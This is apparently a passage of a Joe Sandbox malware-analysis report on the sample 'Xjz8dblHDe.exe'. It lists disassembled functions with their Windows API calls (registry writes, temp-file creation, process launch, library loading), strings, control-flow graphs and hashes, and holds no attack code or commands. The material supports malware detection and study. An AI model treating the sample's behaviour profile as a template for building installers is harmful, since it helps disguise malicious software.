                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 3449924974-1246513382
                                                                    • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                    • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                    • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                    • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                    Function 00405DBC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 719 405dbc-405dc8 720 405dc9-405dfd GetTickCount GetTempFileNameW 719->720 721 405e0c-405e0e 720->721 722 405dff-405e01 720->722 724 405e06-405e09 721->724 722->720 723 405e03 722->723 723->724
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405DDA
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Xjz8dblHDe.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6), ref: 00405DF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: "C:\Users\user\Desktop\Xjz8dblHDe.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-1541024839
                                                                    • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                    • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                    • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                    • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4
                                                                    Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 729 402d44-402d6d call 406104 731 402d72-402d74 729->731 732 402d76-402d7c 731->732 733 402dec-402df0 731->733 734 402d98-402dad RegEnumKeyW 732->734 735 402d7e-402d80 734->735 736 402daf-402dc1 RegCloseKey call 406671 734->736 738 402dd0-402dde RegCloseKey 735->738 739 402d82-402d96 call 402d44 735->739 743 402de0-402de6 RegDeleteKeyW 736->743 744 402dc3-402dce 736->744 738->733 739->734 739->736 743->733 744->733
                                                                    APIs
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Close$Enum
                                                                    • String ID:
                                                                    • API String ID: 464197530-0
                                                                    • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                    • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                    • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                    • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                    Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                      • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186,?,00000000,000000F0), ref: 0040164D
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186, xrefs: 00401640
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186
                                                                    • API String ID: 1892508949-644401023
                                                                    • Opcode ID: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                                                    • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                    • Opcode Fuzzy Hash: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                                                    • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                    Function 00406165 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063D9,80000002), ref: 004061AB
                                                                    • RegCloseKey.KERNELBASE(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,halituses), ref: 004061B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID: : Completed
                                                                    • API String ID: 3356406503-2954849223
                                                                    • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                    • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                    • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                    • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                    Function 00405880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                    • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00405893
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                    • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                    • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                    • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                    Function 00401FFA Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c73a460384e056ff9d12a0a60f21d525f10071a0075d6a226261d218d3999c3
                                                                    • Instruction ID: 96c9f76e6636b9c2d25b0b1467c2954fc3cee1ad24e3c7ba74a0f8c29babf82b
                                                                    • Opcode Fuzzy Hash: 3c73a460384e056ff9d12a0a60f21d525f10071a0075d6a226261d218d3999c3
                                                                    • Instruction Fuzzy Hash: 9531C731D00205EACF21AFA1DE4899E7A71BF44354F24813BF115B61E1CBB98952DB69
                                                                    Function 004023E4 Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseValuelstrlen
                                                                    • String ID:
                                                                    • API String ID: 2655323295-0
                                                                    • Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                                                    • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                    • Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                                                    • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                    Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 56libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D
                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Library$FreeHandleLoadModule
                                                                    • String ID:
                                                                    • API String ID: 2140536961-0
                                                                    • Opcode ID: 85942fc89a7394ec5be02890c795d7ce19105dcf228e749ef0ece73fd9a55274
                                                                    • Instruction ID: 4ef3947a4f3b15eeb1edbcf2825d86a3d57027b1e8ef6f61f5e5c173a0dbc30c
                                                                    • Opcode Fuzzy Hash: 85942fc89a7394ec5be02890c795d7ce19105dcf228e749ef0ece73fd9a55274
                                                                    • Instruction Fuzzy Hash: 54114271D00205ABCF20AFA5CA8859E7A71BF04345F64853BF501F61E0DBB98D91DB69
                                                                    Function 00402259 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065E5
                                                                      • Part of subcall function 004065DA: FindClose.KERNEL32(00000000), ref: 004065F1
                                                                    • lstrlenW.KERNEL32 ref: 00402299
                                                                    • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
